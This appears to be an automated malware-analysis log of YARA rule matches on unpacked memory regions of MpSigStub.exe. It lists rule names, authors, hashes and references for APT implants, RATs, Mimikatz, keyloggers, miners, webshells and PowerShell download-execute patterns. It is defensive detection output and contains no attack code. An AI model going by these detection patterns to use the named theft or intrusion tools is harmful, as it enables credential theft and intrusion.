    Source: 35.3.MpSigStub.exe.28bd80b0d72.190.raw.unpack, type: UNPACKEDPEMatched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
    Source: 35.3.MpSigStub.exe.28bd80b0d72.190.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPEMatched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
    Source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPEMatched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
    Source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPEMatched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
    Source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
    Source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPEMatched rule: APT_APT41_POISONPLUG date = 2019-08-07, hash4 = 3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f, hash3 = f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661, hash2 = 5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90, author = Florian Roth, description = Detects APT41 malware POISONPLUG, reference = https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html, score = 2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd
    Source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPEMatched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
    Source: 35.3.MpSigStub.exe.28bd63ab4aa.184.raw.unpack, type: UNPACKEDPEMatched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd7098dc6.214.unpack, type: UNPACKEDPEMatched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
    Source: 35.3.MpSigStub.exe.28bd7098dc6.214.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd7098dc6.214.unpack, type: UNPACKEDPEMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: 35.3.MpSigStub.exe.28bd63accb2.185.raw.unpack, type: UNPACKEDPEMatched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd718fe9d.129.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 35.3.MpSigStub.exe.28bd718fe9d.129.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd7361a65.95.raw.unpack, type: UNPACKEDPEMatched rule: HackTool_Samples description = Hacktool, score =
    Source: 35.3.MpSigStub.exe.28bd6afc36e.65.unpack, type: UNPACKEDPEMatched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
    Source: 35.3.MpSigStub.exe.28bd6697177.158.unpack, type: UNPACKEDPEMatched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
    Source: 35.3.MpSigStub.exe.28bd6697177.158.unpack, type: UNPACKEDPEMatched rule: APT_Backdoor_Win_DShell_3 author = FireEye, description = This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = cf752e9cd2eccbda5b8e4c29ab5554b6
    Source: 35.3.MpSigStub.exe.28bd6697177.158.unpack, type: UNPACKEDPEMatched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
    Source: 35.3.MpSigStub.exe.28bd7098dc6.98.unpack, type: UNPACKEDPEMatched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
    Source: 35.3.MpSigStub.exe.28bd7098dc6.98.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd7098dc6.98.unpack, type: UNPACKEDPEMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
    Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPEMatched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
    Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPEMatched rule: HackTool_Samples description = Hacktool, score =
    Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPEMatched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
    Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPEMatched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
    Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPEMatched rule: CredentialStealer_Generic_Backdoor date = 2017-06-07, hash1 = edb2d039a57181acf95bd91b2a20bd9f1d66f3ece18506d4ad870ab65e568f2c, author = Florian Roth, description = Detects credential stealer byed on many strings that indicate password store access, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPEMatched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
    Source: 35.3.MpSigStub.exe.28bd7098dc6.64.unpack, type: UNPACKEDPEMatched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
    Source: 35.3.MpSigStub.exe.28bd7098dc6.64.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd7098dc6.64.unpack, type: UNPACKEDPEMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: 35.3.MpSigStub.exe.28bd745f702.85.unpack, type: UNPACKEDPEMatched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 35.3.MpSigStub.exe.28bd745f702.85.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPEMatched rule: SUSP_XMRIG_String date = 2018-12-28, hash1 = eb18ae69f1511eeb4ed9d4d7bcdf3391a06768f384e94427f4fc3bd21b383127, author = Florian Roth, description = Detects a suspicious XMRIG crypto miner executable string in filr, reference = Internal Research
    Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPEMatched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
    Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPEMatched rule: HackTool_Samples description = Hacktool, score =
    Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPEMatched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
    Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPEMatched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
    Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPEMatched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
    Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPEMatched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
    Source: 35.3.MpSigStub.exe.28bd6694af5.157.unpack, type: UNPACKEDPEMatched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
    Source: 35.3.MpSigStub.exe.28bd6694af5.157.unpack, type: UNPACKEDPEMatched rule: APT_Backdoor_Win_DShell_3 author = FireEye, description = This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = cf752e9cd2eccbda5b8e4c29ab5554b6
    Source: 35.3.MpSigStub.exe.28bd6694af5.157.unpack, type: UNPACKEDPEMatched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
    Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPEMatched rule: SUSP_XMRIG_String date = 2018-12-28, hash1 = eb18ae69f1511eeb4ed9d4d7bcdf3391a06768f384e94427f4fc3bd21b383127, author = Florian Roth, description = Detects a suspicious XMRIG crypto miner executable string in filr, reference = Internal Research
    Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPEMatched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
    Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPEMatched rule: HackTool_Samples description = Hacktool, score =
    Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPEMatched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
    Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPEMatched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
    Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPEMatched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
    Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPEMatched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_CsharpAmsiBypass date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/WayneJLee/CsharpAmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
    Source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPEMatched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPEMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPEMatched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPEMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPEMatched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPEMatched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPEMatched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPEMatched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPEMatched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPEMatched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPEMatched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPEMatched rule: ChinaChopper_Generic date = 2015/03/10, author = Florian Roth, description = China Chopper Webshells - PHP and ASPX, reference = https://www.fireeye.com/content/dam/legacy/resources/pdfs/fireeye-china-chopper-report.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
